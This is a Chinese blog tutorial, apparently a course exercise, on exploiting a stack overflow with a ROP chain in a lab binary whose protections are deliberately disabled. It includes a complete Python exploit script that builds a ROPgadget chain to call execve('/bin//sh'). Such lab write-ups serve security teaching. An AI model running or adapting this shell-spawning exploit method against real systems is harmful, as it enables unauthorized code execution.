使用ROP攻击利用栈溢出漏洞

最新推荐文章于 2024-06-12 19:08:11 发布
最新推荐文章于 2024-06-12 19:08:11 发布
阅读量1.5k 收藏 14
点赞数 2
分类专栏: 软件安全 文章标签: python ubuntu 信息安全 栈溢出 ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44338712/article/details/115641519
版权

使用ROP攻击利用栈溢出漏洞

环境:ubuntu16.04, gcc, python2.7

说明:为了成功实现Return2LibC攻击,这里关闭了可执行栈、关闭了StackGuard、关闭了地址随机化,终极目标是执行 system("/bin/sh")

⭐️⭐️注意⭐️⭐️:这是承接上一篇文章使用Return2LibC利用栈溢出漏洞的,栈溢出漏洞程序和上一篇相同

1. 安装ROPgadget

对于ubuntu16.04,默认安装了python2,只需要安装pip即可,然后再安装ROPgadget依赖capstone,就能顺利安装ROPgadget了,命令如下:

sudoapt-get install python-pip  
sudopip install capstone  
sudopip install ROPgadget

2. 实现ROP攻击

homework2测试程序来自这篇文章

安装好之后就直接使用ROPgadget分析homework2,但是会提示Can’t find the ‘mov dword ptr[r32], r32’ gadget,说明缺少代码块,如下图所示。

cDRDjx.png

由于代码段太少了,我们进行静态编译,将库函数都直接编译进可执行文件中。

gcc -fno-stack-protector -z noexecstack -static -o homework2 homework2.c

cDRqUg.png

再使用ROPgadget分析一下测试程序,成功生成了gadget链

cDRj8s.png

生成了gadget链之后,我们还需要做一些padding,由上一次return2libc实验可以知道,想覆盖[esp+4]需要预先填充37个字节,于是padding后的代码如下:

#/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = ''
for i in range(37):
    p += pack('<B', 0xaa)
p += pack('<I', 0x0806f1db) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080b8c86) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08054a9b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f1db) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x080b8c86) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08054a9b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f1db) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080494a3) # xor eax, eax ; ret
p += pack('<I', 0x08054a9b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080df505) # pop ecx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x0806f1db) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080494a3) # xor eax, eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0807ac96) # inc eax ; ret
p += pack('<I', 0x0806cde5) # int 0x80
badfile = open("badfile", "wb")
badfile.write(p)
badfile.close()

运行上述脚本就能得到我们的badfile,如下图(注意使用python2执行)

cDWuqK.png

然后再运行测试程序,就成功实现了ROP攻击,获得了一个shell

cDfCQI.png

panfengblog
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初识栈溢出利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5776
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
栈溢出攻击c语言_栈溢出攻击及防护方法简介
weixin_39639518的博客
12-21 1344
0. 引言如果你学的第一门程序语言是C语言,那么下面这段程序很可能是你写出来的第一个有完整的 “输入---处理---输出” 流程的程序:#include int main() {char name[64];printf("What's your name?");scanf("%s", name);printf("Hello, %s!\n", name);return 0;}也许这段小程序给你带来了...
栈溢出漏洞利用一,详解基本ROP,构造rop链条实现攻击(pwn入门)
2402_83422357的博客
05-29 1058
基本ROP攻击手法的话其实还有一个最常用的,比赛经常出现的,也就是打syscall的ROP攻击链没有提到,下次有时间讲下打syscall的攻击手法,但是只有先把上面的两个ROP链的攻击手法会懂了,尤其是ret2shellcode,才能够有可能真正理解syscall的ROP攻击链,其实我自己对于ret2shellcode也仅仅是学了个入门而已,还有很多不懂的,还在学习ing.参考文章:CTF Wiki。
栈溢出漏洞介绍与利用
这里没人
05-14 4351
简介 栈溢出,0day漏洞中最简单的一种漏洞。相比起其它漏洞栈溢出最容易被出现,也最容易利用。是一种非常常见的漏洞。一般如果服务器程序出现了栈溢出漏洞,那么这台服务器距离被pwn也不远了。 原理 栈溢出的主要产生原因是因为程序对用户输入字符串的长度检查不严格,或者有逻辑漏洞,或者一些菜鸟根本没有进行长度检查而产生的漏洞。相信新手程序员一般都写过这样的代码。 char dest[...
栈溢出漏洞
AlexYoung28的博客
10-22 2240
1.基础知识 函数与函数栈 栈是一种先进后出的特殊数据结构,用于存储 程序在运行时的临时数据和地址,用于支撑函 数的运行和嵌套调用。 栈的分配是由程序编译时确定下来的,无法由 程序员控制。 栈中存储着线程或者进程的局部变量 不同的进程或线程的栈处于不同的位置,在程 序正常运行时不同线程和进程之间不能互相访 问彼此的栈地址 函数传递参数: 函数都要通过传递进去的参数来确...
栈溢出漏洞利用二,ret2syscall,构造rop链条实现攻击(pwn入门)
最新发布
2402_83422357的博客
06-12 915
有点时候不存在/bin/sh字符串也是可以用这种攻击手法打的,就是使用read函数把/bin/sh写入.bss段,也可以控制程序执行系统调用,获取 shell。
栈溢出漏洞利用和缓解
weixin_34133829的博客
03-24 831
一直有人说这个时代做渗透太难了, 各个平台都开始重视安全性, 不像十几年前, 随便有个栈溢出就能轻松利用. 现在的环境对于新手而言确实不算友好, 上来就需要 面临着各种边界保护, 堆栈保护, 地址布局随机化. 但现实如此, 与其抱怨, 不如直面现实, 拥抱变化, 对吧? 本文所演示的环境为64位Linux+32位ELF程序. 文中所用到的代码和exp皆可在github仓库中找到. 前言 知识...
浅谈栈溢出漏洞利用技术——学习笔记
楠木种子的三亩地
01-27 1366
文章目录基础知识寄存器:重要寄存器栈:一种先进先出的数据结构函数调用栈溢出的保护机制栈上的数据被当做指令来执行让攻击者难以找到shellcode地址检测Stack Overflow(栈溢出栈溢出利用方法现代栈溢出利用技术基础:ROPCTF中ROP技术的常见套路利用signal机制的ROP技术(SROP)没有binary怎么办(BROP)BROP的目标BROP的条件劫持栈指针(Stack Piv...
栈溢出总结之基础ROP
weixin_45097188的博客
02-28 576
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 例子 仅开了NX栈不可执行保护...
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
3. **Blind Return-Oriented Programming (BROP)**:在没有目标二进制文件的情况下,通过已知的溢出漏洞和程序行为进行攻击。 每个方法都有其特定的使用场景和挑战,例如,SROP和BROP在某些情况下可能更为有效,...
栈溢出基础——ROP1.0的例题
07-13
ROP(Return-Oriented Programming)是利用栈溢出的一种高级技术,它不依赖于直接注入恶意代码,而是通过寻找存在于程序中的小段已有的可信任指令(通常称为“gadgets”),并利用这些片段构造出任意代码执行的链条...
缓冲区漏洞溢出攻击例程
04-30
如果溢出的部分恰好覆盖了返回地址,那么当函数调用结束时,程序会跳转到攻击者指定的地址执行代码,这就是所谓的“返回导向编程”(Return-Oriented Programming, ROP)或“栈溢出攻击。 二、简单缓冲区攻击例程...
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
在这个场景中,我们关注的是在一个开启NX(No eXecute,防止栈上数据被执行)但未开启ASLR(Address Space Layout Randomization,地址空间布局随机化)的环境中如何利用栈溢出漏洞。NX技术使得栈上的数据无法直接...
缓冲区溢出——栈溢出
08-04
1. **返回导向编程(Return-Oriented Programming, ROP)**:攻击者通过栈溢出覆盖返回地址,使其指向一系列短小的指令片段(称为 gadgets),组合起来执行任意代码。 2. **堆栈pivot**:改变栈的布局,使得溢出的...
CCPROXY漏洞利用
panfengblog
11-02 2081
CCPROXY漏洞利用 CCProxy是一款非常流行的下载量最大的的国产代理服务器软件,其CCProxy 6.2版本存在一个栈溢出漏洞,可以通过此漏洞进行shellcode攻击,以下是学习过程的一个小记录吧 : ) 1.找到并定位溢出点 使用ping命令加一个超长的字符串加一个主机名,代理端会返回Host not found。 当输入的字符串足够长时(比如2000个a),软件就会溢出奔溃,通过二分法尝试,发现ping后最多接1009个字符,第1010字符开始溢出,并且前四字节无用,如下图,当输入
使用Detours库完成一个安全检测小工具
panfengblog
03-27 1808
使用Detours库完成一个安全检测小工具 Detours库可以拦截任意的API调用,拦截代码是在动态运行时加载的。github链接:PFSafetyGuard???? 1. Get start 1.1 项目介绍 项目主要有四个部分: testCode:测试程序,主要包含一些我们需要抓取的API和异常操作 PFDLL:定义了需要HOOK的winAPI和替换的函数 syringe:注射器程序,主要将PFDLL程序中的替换函数替换测试程序testCode中的API PFSafetyGuard:图形界面程序
使用Metasploit对WindowsXP渗透测试
panfengblog
11-17 1378
使用Metasploit对WindowsXP渗透测试 哇,见识到了,渗透好猛 _ (大佬勿喷,我是菜鸡QAQ) 1. 破解用户口令 在我们使用漏洞渗透拿到windows的系统权限(system权限)时,就可以使用用hashdump或者scraper脚本获取用户口令hash辣~~ 可以通过hash碰撞的方式获得口令明文,或者直接使用mimikatz获得口令明文(当然是选择mimikatz更快鸭!) 2. 权限提升 参考博客:点我:-) 我们需要先拿到一个权限受限的shell鸭(比如使用ms10-0
栈溢出漏洞利用说法有那些
05-13
2.ROP攻击攻击者可以利用栈溢出漏洞构造ROP链,绕过程序的ASLR和DEP机制,执行恶意代码。 3.格式化字符串漏洞攻击者可以利用格式化字符串漏洞来泄漏程序的内存地址,然后利用栈溢出漏洞覆盖返回地址,执行恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值